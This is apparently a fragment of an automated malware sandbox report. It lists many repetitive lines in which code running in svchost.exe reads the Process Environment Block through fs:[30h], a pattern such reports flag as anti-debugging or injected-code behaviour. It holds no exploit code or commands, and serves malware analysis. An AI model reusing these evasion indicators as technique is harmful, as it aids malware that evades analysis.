Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	10_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	10_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]	10_2_03A5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A325E0 mov eax, dword ptr fs:[00000030h]	10_2_03A325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	10_2_03A6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6C5ED mov eax, dword ptr fs:[00000030h]	10_2_03A6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	10_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E5CF mov eax, dword ptr fs:[00000030h]	10_2_03A6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A365D0 mov eax, dword ptr fs:[00000030h]	10_2_03A365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	10_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]	10_2_03A6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40535 mov eax, dword ptr fs:[00000030h]	10_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40535 mov eax, dword ptr fs:[00000030h]	10_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40535 mov eax, dword ptr fs:[00000030h]	10_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40535 mov eax, dword ptr fs:[00000030h]	10_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40535 mov eax, dword ptr fs:[00000030h]	10_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40535 mov eax, dword ptr fs:[00000030h]	10_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E53E mov eax, dword ptr fs:[00000030h]	10_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E53E mov eax, dword ptr fs:[00000030h]	10_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E53E mov eax, dword ptr fs:[00000030h]	10_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E53E mov eax, dword ptr fs:[00000030h]	10_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E53E mov eax, dword ptr fs:[00000030h]	10_2_03A5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC6500 mov eax, dword ptr fs:[00000030h]	10_2_03AC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]	10_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]	10_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]	10_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]	10_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]	10_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]	10_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B04500 mov eax, dword ptr fs:[00000030h]	10_2_03B04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6656A mov eax, dword ptr fs:[00000030h]	10_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6656A mov eax, dword ptr fs:[00000030h]	10_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6656A mov eax, dword ptr fs:[00000030h]	10_2_03A6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A38550 mov eax, dword ptr fs:[00000030h]	10_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A38550 mov eax, dword ptr fs:[00000030h]	10_2_03A38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A364AB mov eax, dword ptr fs:[00000030h]	10_2_03A364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A644B0 mov ecx, dword ptr fs:[00000030h]	10_2_03A644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]	10_2_03ABA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A304E5 mov ecx, dword ptr fs:[00000030h]	10_2_03A304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2E420 mov eax, dword ptr fs:[00000030h]	10_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2E420 mov eax, dword ptr fs:[00000030h]	10_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2E420 mov eax, dword ptr fs:[00000030h]	10_2_03A2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2C427 mov eax, dword ptr fs:[00000030h]	10_2_03A2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]	10_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]	10_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]	10_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]	10_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]	10_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]	10_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB6420 mov eax, dword ptr fs:[00000030h]	10_2_03AB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6A430 mov eax, dword ptr fs:[00000030h]	10_2_03A6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A68402 mov eax, dword ptr fs:[00000030h]	10_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A68402 mov eax, dword ptr fs:[00000030h]	10_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A68402 mov eax, dword ptr fs:[00000030h]	10_2_03A68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABC460 mov ecx, dword ptr fs:[00000030h]	10_2_03ABC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5A470 mov eax, dword ptr fs:[00000030h]	10_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5A470 mov eax, dword ptr fs:[00000030h]	10_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5A470 mov eax, dword ptr fs:[00000030h]	10_2_03A5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]	10_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]	10_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]	10_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]	10_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]	10_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]	10_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]	10_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6E443 mov eax, dword ptr fs:[00000030h]	10_2_03A6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2645D mov eax, dword ptr fs:[00000030h]	10_2_03A2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5245A mov eax, dword ptr fs:[00000030h]	10_2_03A5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40BBE mov eax, dword ptr fs:[00000030h]	10_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40BBE mov eax, dword ptr fs:[00000030h]	10_2_03A40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	10_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	10_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A38BF0 mov eax, dword ptr fs:[00000030h]	10_2_03A38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5EBFC mov eax, dword ptr fs:[00000030h]	10_2_03A5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]	10_2_03ABCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A50BCB mov eax, dword ptr fs:[00000030h]	10_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A50BCB mov eax, dword ptr fs:[00000030h]	10_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A50BCB mov eax, dword ptr fs:[00000030h]	10_2_03A50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A30BCD mov eax, dword ptr fs:[00000030h]	10_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A30BCD mov eax, dword ptr fs:[00000030h]	10_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A30BCD mov eax, dword ptr fs:[00000030h]	10_2_03A30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]	10_2_03ADEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	10_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5EB20 mov eax, dword ptr fs:[00000030h]	10_2_03A5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	10_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AF8B28 mov eax, dword ptr fs:[00000030h]	10_2_03AF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	10_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	10_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	10_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	10_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	10_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	10_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	10_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	10_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAEB1D mov eax, dword ptr fs:[00000030h]	10_2_03AAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2CB7E mov eax, dword ptr fs:[00000030h]	10_2_03A2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	10_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC6B40 mov eax, dword ptr fs:[00000030h]	10_2_03AC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFAB40 mov eax, dword ptr fs:[00000030h]	10_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD8B42 mov eax, dword ptr fs:[00000030h]	10_2_03AD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	10_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A38AA0 mov eax, dword ptr fs:[00000030h]	10_2_03A38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A86AA4 mov eax, dword ptr fs:[00000030h]	10_2_03A86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	10_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	10_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	10_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	10_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	10_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	10_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	10_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	10_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3EA80 mov eax, dword ptr fs:[00000030h]	10_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03B04A80 mov eax, dword ptr fs:[00000030h]	10_2_03B04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A68A90 mov edx, dword ptr fs:[00000030h]	10_2_03A68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	10_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6AAEE mov eax, dword ptr fs:[00000030h]	10_2_03A6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A86ACC mov eax, dword ptr fs:[00000030h]	10_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A86ACC mov eax, dword ptr fs:[00000030h]	10_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A86ACC mov eax, dword ptr fs:[00000030h]	10_2_03A86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A30AD0 mov eax, dword ptr fs:[00000030h]	10_2_03A30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	10_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A64AD0 mov eax, dword ptr fs:[00000030h]	10_2_03A64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6CA24 mov eax, dword ptr fs:[00000030h]	10_2_03A6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5EA2E mov eax, dword ptr fs:[00000030h]	10_2_03A5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A54A35 mov eax, dword ptr fs:[00000030h]	10_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A54A35 mov eax, dword ptr fs:[00000030h]	10_2_03A54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6CA38 mov eax, dword ptr fs:[00000030h]	10_2_03A6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABCA11 mov eax, dword ptr fs:[00000030h]	10_2_03ABCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	10_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	10_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6CA6F mov eax, dword ptr fs:[00000030h]	10_2_03A6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AACA72 mov eax, dword ptr fs:[00000030h]	10_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AACA72 mov eax, dword ptr fs:[00000030h]	10_2_03AACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]	10_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]	10_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]	10_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]	10_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]	10_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]	10_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A36A50 mov eax, dword ptr fs:[00000030h]	10_2_03A36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40A5B mov eax, dword ptr fs:[00000030h]	10_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A40A5B mov eax, dword ptr fs:[00000030h]	10_2_03A40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A429A0 mov eax, dword ptr fs:[00000030h]	10_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A309AD mov eax, dword ptr fs:[00000030h]	10_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A309AD mov eax, dword ptr fs:[00000030h]	10_2_03A309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB89B3 mov esi, dword ptr fs:[00000030h]	10_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	10_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB89B3 mov eax, dword ptr fs:[00000030h]	10_2_03AB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]	10_2_03ABE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A629F9 mov eax, dword ptr fs:[00000030h]	10_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A629F9 mov eax, dword ptr fs:[00000030h]	10_2_03A629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC69C0 mov eax, dword ptr fs:[00000030h]	10_2_03AC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	10_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	10_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	10_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	10_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	10_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]	10_2_03A3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A649D0 mov eax, dword ptr fs:[00000030h]	10_2_03A649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]	10_2_03AFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB892A mov eax, dword ptr fs:[00000030h]	10_2_03AB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC892B mov eax, dword ptr fs:[00000030h]	10_2_03AC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAE908 mov eax, dword ptr fs:[00000030h]	10_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AAE908 mov eax, dword ptr fs:[00000030h]	10_2_03AAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABC912 mov eax, dword ptr fs:[00000030h]	10_2_03ABC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A28918 mov eax, dword ptr fs:[00000030h]	10_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A28918 mov eax, dword ptr fs:[00000030h]	10_2_03A28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A56962 mov eax, dword ptr fs:[00000030h]	10_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A56962 mov eax, dword ptr fs:[00000030h]	10_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A56962 mov eax, dword ptr fs:[00000030h]	10_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A7096E mov eax, dword ptr fs:[00000030h]	10_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A7096E mov edx, dword ptr fs:[00000030h]	10_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A7096E mov eax, dword ptr fs:[00000030h]	10_2_03A7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD4978 mov eax, dword ptr fs:[00000030h]	10_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD4978 mov eax, dword ptr fs:[00000030h]	10_2_03AD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABC97C mov eax, dword ptr fs:[00000030h]	10_2_03ABC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB0946 mov eax, dword ptr fs:[00000030h]	10_2_03AB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A30887 mov eax, dword ptr fs:[00000030h]	10_2_03A30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABC89D mov eax, dword ptr fs:[00000030h]	10_2_03ABC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]	10_2_03AFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	10_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]	10_2_03A6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]	10_2_03A5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A52835 mov eax, dword ptr fs:[00000030h]	10_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A52835 mov eax, dword ptr fs:[00000030h]	10_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A52835 mov eax, dword ptr fs:[00000030h]	10_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A52835 mov ecx, dword ptr fs:[00000030h]	10_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A52835 mov eax, dword ptr fs:[00000030h]	10_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A52835 mov eax, dword ptr fs:[00000030h]	10_2_03A52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6A830 mov eax, dword ptr fs:[00000030h]	10_2_03A6A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD483A mov eax, dword ptr fs:[00000030h]	10_2_03AD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD483A mov eax, dword ptr fs:[00000030h]	10_2_03AD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABC810 mov eax, dword ptr fs:[00000030h]	10_2_03ABC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABE872 mov eax, dword ptr fs:[00000030h]	10_2_03ABE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03ABE872 mov eax, dword ptr fs:[00000030h]	10_2_03ABE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC6870 mov eax, dword ptr fs:[00000030h]	10_2_03AC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AC6870 mov eax, dword ptr fs:[00000030h]	10_2_03AC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A42840 mov ecx, dword ptr fs:[00000030h]	10_2_03A42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A60854 mov eax, dword ptr fs:[00000030h]	10_2_03A60854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A34859 mov eax, dword ptr fs:[00000030h]	10_2_03A34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A34859 mov eax, dword ptr fs:[00000030h]	10_2_03A34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6CF80 mov eax, dword ptr fs:[00000030h]	10_2_03A6CF80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A62F98 mov eax, dword ptr fs:[00000030h]	10_2_03A62F98
